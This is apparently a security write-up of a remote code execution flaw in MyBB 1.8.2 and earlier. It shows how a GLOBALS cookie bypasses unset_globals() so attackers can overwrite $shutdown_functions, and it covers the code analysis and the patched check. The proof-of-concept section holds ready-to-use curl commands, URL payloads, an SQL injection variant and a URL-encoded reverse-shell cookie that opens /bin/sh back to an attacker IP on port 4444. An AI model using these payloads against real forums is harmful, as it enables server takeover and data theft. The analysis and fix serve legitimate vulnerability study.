MyBB < 1.8.2 unset_globals() Function Bypass and Remote Code Execution (Reverse Shell Exploit)

Catalogue
1. vulnerability description
2. vulnerability trigger conditions
3. impact scope
4. vulnerability code analysis
5. defense methods
6. attack and defense thinking
1. vulnerability description
MyBB's unset_globals() function can be bypassed under special conditions, which makes remote code execution possible.
Relevant Link:
https://cxsecurity.com/issue/WLB-2015120164
https://packetstormsecurity.com/files/134833/MyBB-1.8.2-Code-Execution.html
https://www.exploit-db.com/exploits/35323/
2. vulnerability trigger conditions
0x1: POC1
```
// php.ini configuration
request_order = "GP"
register_globals = On

// remote code execution by just using curl on the command line
curl --cookie "GLOBALS=1; shutdown_functions[0][function]=phpinfo; shutdown_functions[0][arguments][]=-1" http://30.9.192.207/mybb_1802/
```
PHP automated verification script
0x2: POC2
```
// php.ini
disable_functions = ini_get
register_globals = On

// url
index.php?shutdown_functions[0][function]=phpinfo&shutdown_functions[0][arguments][]=-1
```
0x3: POC3
```
// php.ini configuration
request_order = "GP"
register_globals = On

// url
curl --cookie "GLOBALS=1; shutdown_queries[]=SQL_Inj" http://www.target/css.php

// Works on disable_functions = ini_get and register_globals = On:
css.php?shutdown_queries[]=SQL_Inj
```
3. scope of impact
MyBB 1.8.x up to and including 1.8.2, and MyBB 1.6.x up to and including 1.6.15
4. vulnerability code analysis
\mybb_1802\inc\class_core.php

```php
..
// If we've got register globals on, then kill them too
/* When PHP's register_globals configuration is set on, MyBB calls the unset_globals() function:
   all global variables registered by PHP from the $_POST, $_GET, $_FILES and $_COOKIE arrays
   are destroyed. This is a security mechanism implemented by MyBB: at the beginning of each
   PHP script request, the automatic registration of the superglobals is reversed, offsetting
   the security problems that register_globals can cause. */
if(@ini_get("register_globals") == 1)
{
    $this->unset_globals($_POST);
    $this->unset_globals($_GET);
    $this->unset_globals($_FILES);
    $this->unset_globals($_COOKIE);
}
..
/**
 * Unsets globals from a specific array.
 *
 * @param array The array to unset from.
 */
function unset_globals($array)
{
    if(!is_array($array))
    {
        return;
    }
    foreach(array_keys($array) as $key)
    {
        unset($GLOBALS[$key]);
        unset($GLOBALS[$key]); // Double unset to circumvent the zend_hash_del_key_or_index hole in PHP <4.4.3 and <5.1.4
    }
}
```
This logic looks sound and is written with security in mind. However, because of some behaviour of the PHP engine, the effect of unset_globals() can be bypassed.

1. Normally, variables passed in via GPC are automatically removed with unset($GLOBALS[$var]) even when register_globals is enabled. This is MyBB's own defence against older PHP versions where register_globals = On was mistakenly enabled, and it prevents local variable overwrite.
2. However, there is a special variable, GLOBALS. The $GLOBALS superglobal array is created and maintained by the PHP engine; $GLOBALS['key'] can be read and written anywhere in the program, and the engine binds the $GLOBALS array to the global symbol table.
3. If the attacker passes in foo.php?GLOBALS=1, MyBB executes unset($GLOBALS["GLOBALS"]); this directly severs the connection between $GLOBALS and the global symbol table.
4. The direct consequence is that the parameter keys the user passed in via $_GET, $_POST and $_COOKIE can no longer be reached: the GPC parameters are removed through $GLOBALS, so the remaining unset operations no longer work properly.
Note that MyBB's defence framework in \mybb_1802\inc\class_core.php had already noticed this problem.

```php
..
function __construct()
{
    // Set up MyBB
    $protected = array("_GET", "_POST", "_SERVER", "_COOKIE", "_FILES", "_ENV", "GLOBALS");
    foreach($protected as $var)
    {
        if(isset($_REQUEST[$var]) || isset($_FILES[$var]))
        {
            die("Hacking attempt");
        }
    }
..
```
MyBB intends to prevent the names of global variables from being supplied through GET/POST/GLOBALS, but $_REQUEST in PHP is also a superglobal whose contents are determined by php.ini. Since PHP 5.3, request_order = "GP" means that $_REQUEST only contains the GET/POST parameters, which makes the filter ineffective for COOKIES: an attacker can place the variables in a cookie to deliver the overwrite payload.

```
GLOBALS=1; shutdown_functions[0][function]=exec; shutdown_functions[0][arguments][]=php%20%2Dr%20%27%24sock%3Dfsockopen%28%22$yourip%22%2C%204444%29%3Bexec%28%22%2Fbin%2Fsh%20%2Di%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27;
```
To sum up, there are two scenarios in which the prerequisite is met:

1. MyBB on PHP <= 5.3: request_order = "GP"
2. MyBB on PHP 5.3 <= version <= 5.4: register_globals = On
With the premise of variable overwrite understood, the next step is to see how the payload is constructed and how it triggers the local variable overwrite. \mybb_1802\inc\class_core.php

```php
// class_core.php is included by almost all page scripts, so the following destructor is called frequently
function __destruct()
{
    // Run shutdown function
    if(function_exists("run_shutdown"))
    {
        run_shutdown();
    }
}
```
run_shutdown(); \mybb_1802\inc\functions.php

```php
/**
 * Runs the shutdown items after the page has been sent to the browser.
 */
function run_shutdown()
{
    // $shutdown_functions is initialised via the add_shutdown() function in init.php,
    // but because of the local variable overwrite vulnerability, $shutdown_functions can be hijacked
    global $config, $db, $cache, $plugins, $error_handler, $shutdown_functions, $shutdown_queries, $done_shutdown, $mybb;

    if($done_shutdown == true || !$config || (isset($error_handler) && $error_handler->has_errors))
    {
        return;
    }
    ..
    // Run any shutdown functions if we have them
    if(is_array($shutdown_functions))
    {
        foreach($shutdown_functions as $function)
        {
            call_user_func_array($function['function'], $function['arguments']);
        }
    }
    ..
```
Relevant Link:
http://0day.today/exploit/22913
5. defense methods
\inc\class_core.php

```php
class MyBB
{
    ..
    function __construct()
    {
        // Set up MyBB
        $protected = array("_GET", "_POST", "_SERVER", "_COOKIE", "_FILES", "_ENV", "GLOBALS");
        foreach($protected as $var)
        {
            /*if(isset($_REQUEST[$var]) || isset($_FILES[$var]))*/
            if(isset($_GET[$var]) || isset($_POST[$var]) || isset($_COOKIE[$var]) || isset($_FILES[$var]))
            {
                die("Hacking attempt");
            }
        }
    ..
```
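To make the difference between the original guard (section 4) and the fixed guard above concrete, the following Python model is an added example, not MyBB's code: it reproduces how PHP assembles $_REQUEST from request_order and runs both checks against the POC1 cookie. The cookie parsing and the request_order handling are simplifications assumed for the demonstration.

```python
from urllib.parse import unquote

# Added example, not MyBB code: variable names MyBB refuses to accept from the client.
PROTECTED = ("_GET", "_POST", "_SERVER", "_COOKIE", "_FILES", "_ENV", "GLOBALS")


def parse_cookie(header):
    """Map a Cookie header to {top-level PHP variable name: raw value}.
    PHP registers 'shutdown_functions[0][function]' under the top-level
    name 'shutdown_functions', which is what the guard compares against."""
    names = {}
    for part in header.split(";"):
        if "=" not in part:
            continue
        key, value = part.strip().split("=", 1)
        names[unquote(key).split("[", 1)[0]] = unquote(value)
    return names


def build_request(get, post, cookie, request_order):
    """Reproduce how PHP assembles $_REQUEST: sources are merged in the
    order given by request_order (G, P, C); a source not listed is absent."""
    sources = {"G": get, "P": post, "C": cookie}
    request = {}
    for letter in request_order.upper():
        request.update(sources.get(letter, {}))
    return request


def weak_check(get, post, cookie, files, request_order="GP"):
    """MyBB <= 1.8.2: only $_REQUEST and $_FILES are inspected, so with
    request_order = "GP" a cookie carrying GLOBALS is never seen."""
    request = build_request(get, post, cookie, request_order)
    return any(var in request or var in files for var in PROTECTED)


def fixed_check(get, post, cookie, files):
    """MyBB 1.8.3: each superglobal is inspected directly, independent of
    request_order, which is the change in the patched __construct()."""
    return any(var in get or var in post or var in cookie or var in files
               for var in PROTECTED)


# Constructed sample: the cookie from POC1 above.
POC1_COOKIE = ("GLOBALS=1; shutdown_functions[0][function]=phpinfo; "
               "shutdown_functions[0][arguments][]=-1")

if __name__ == "__main__":
    cookie = parse_cookie(POC1_COOKIE)
    print("weak check, request_order=GP :", weak_check({}, {}, cookie, {}))
    print("weak check, request_order=GPC:", weak_check({}, {}, cookie, {}, "GPC"))
    print("fixed check                  :", fixed_check({}, {}, cookie, {}))
```

Run as a script it prints False, True, True: the pre-1.8.3 guard only catches the cookie when request_order includes C, while the fixed guard catches it regardless of the php.ini setting.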
Relevant Link:
http://blog.mybb.com/2014/11/20/mybb-1-8-3-1-6-16-released-security-releases/
http://cn.313.ninja/exploit/22913
6. attack and defense thinking
Copyright (c) 2016 Little5ann All rights reserved